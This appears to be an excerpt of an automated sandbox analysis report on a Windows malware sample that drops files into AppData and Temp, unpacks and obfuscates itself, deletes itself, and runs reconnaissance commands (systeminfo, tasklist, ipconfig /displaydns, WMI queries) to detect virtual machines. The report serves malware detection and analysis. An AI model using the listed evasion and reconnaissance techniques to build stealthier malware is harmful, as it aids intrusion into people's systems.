Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 9VgIkx4su0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Unpacked PE file: 0.2.9VgIkx4su0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\eihchav Unpacked PE file: 4.2.eihchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Unpacked PE file: 6.2.3E40.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dghchav Unpacked PE file: 7.2.dghchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process, 8_2_00007FF6DFE278EC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_004031DB push eax; ret 0_2_004032AB
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_0062515F push esp; ret 0_2_00625161
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00623502 push B63524ADh; retn 001Fh 0_2_00623539
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_00623FFF pushfd ; iretd 0_2_00624000
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Code function: 0_2_02091540 pushad ; ret 0_2_02091550
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_004014D9 pushad ; ret 4_2_004014E9
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_004031DB push eax; ret 4_2_004032AB
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_005E183A push B63524ADh; retn 001Fh 4_2_005E1871
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_005E2337 pushfd ; iretd 4_2_005E2338
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_005E3497 push esp; ret 4_2_005E3499
Source: C:\Users\user\AppData\Roaming\eihchav Code function: 4_2_02091540 pushad ; ret 4_2_02091550
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_0040100B push esi; ret 6_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_0040280E push esp; ret 6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_0040281F push esp; ret 6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00402822 push esp; ret 6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00401328 push edi; retf 6_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004027ED push esp; ret 6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_004027FB push esp; ret 6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00562854 push esp; ret 6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00562875 push esp; ret 6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00561072 push esi; ret 6_2_00561073
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00562862 push esp; ret 6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00561909 push esp; iretd 6_2_005619BF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00561386 push edi; retf 6_2_00561391
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00562886 push esp; ret 6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_00562889 push esp; ret 6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006C0545 push esi; ret 6_2_006C0546
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006C085C push edi; retf 6_2_006C085D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006AD83E push eax; retf 006Ah 6_2_006AD81D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006C1FCA push 9A832F1Fh; iretd 6_2_006C1FD0

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dghchav Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FDDB.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eihchav Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3E40.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dghchav Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eihchav Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\9vgikx4su0.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\eihchav:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\dghchav:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\3E40.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\9VgIkx4su0.exe API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\9VgIkx4su0.exe API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\eihchav API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\eihchav API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Local\Temp\3E40.exe API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Local\Temp\3E40.exe API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\dghchav API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\dghchav API/Special instruction interceptor: Address: 7FF8C88ED584
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 9VgIkx4su0.exe, 00000000.00000002.2114577887.00000000005FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, 15_2_00191016
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\AppData\Local\Temp\3E40.exe Code function: 6_2_006AD884 sldt word ptr [eax] 6_2_006AD884
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 455 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2583 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 798 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 595 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 888 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 858 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 2812
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2054
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 4097
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4227
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Roaming\dghchav Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\eihchav Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\explorer.exe API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\dghchav API coverage: 6.8 %
Source: C:\Users\user\AppData\Roaming\eihchav API coverage: 6.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6532 Thread sleep count: 455 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 984 Thread sleep count: 2583 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 984 Thread sleep time: -258300s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep count: 798 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep time: -79800s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2300 Thread sleep count: 303 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1216 Thread sleep count: 325 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1216 Thread sleep time: -32500s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3116 Thread sleep count: 331 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3116 Thread sleep time: -33100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 984 Thread sleep count: 595 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 984 Thread sleep time: -59500s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3440 Thread sleep count: 2812 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3440 Thread sleep time: -2812000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4568 Thread sleep count: 2054 > 30
Source: C:\Windows\explorer.exe TID: 4568 Thread sleep time: -2054000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6056 Thread sleep count: 4097 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6056 Thread sleep time: -4097000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5980 Thread sleep count: 4227 > 30
Source: C:\Windows\explorer.exe TID: 5980 Thread sleep time: -4227000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
